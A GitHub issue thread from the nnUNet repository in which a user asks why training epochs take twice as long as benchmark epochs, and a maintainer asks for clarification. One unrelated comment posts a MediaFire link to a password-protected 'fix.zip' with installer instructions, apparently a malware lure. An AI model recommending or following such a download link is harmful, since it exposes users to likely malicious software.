### ISSUE TITLE
Epoch time in training double that of benchmarking

### ISSUE THREAD

**Issue by sabinevater** [MIC-DKFZ/nnUNet#2469]
Dear all,

I have a dataset for which I recently ran the benchmarking with the following epoch time results: 

- for 2d 203 s with and 53 s without data loading
- for 3d_fullres with data loading 72 s and 53 swithout data loading 

During the training I have epoch times between 410 and 440 s for 2d and for 3d fullres around 140 seconds.

Could anybody help me with this problem? That would be amazing!

Kind regards

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GregorKoehler** [comment]
HI @sabinevater ,

I'm not quite sure what you're after. Are you wondering where the increased epoch times come from during training? If this is the case, what exactly did you time when coming up with the times in your bullet points with/without data loading? Was this not when training? If you provide some more context, I might be able to help more.

**Comment by sabinevater** [comment]
Hi @GregorKoehler ,

I am sorry for the my unclear writing. The times in the bullet points are the benchmarking results for the dataset, during the training the epoch times are twice as long as during benchmarking. Due to this I cannot train my model on my cluster because I exceed the time constraints. Furthermore, I wonder why for 2d the discrepancy between "data loading" and "no data loading" is so high for 2d, but not for 3d_fullres (in other datasets I did not encounter this phenomenon), but this is secondary to the problem of the large training epoch times.

Kind regards
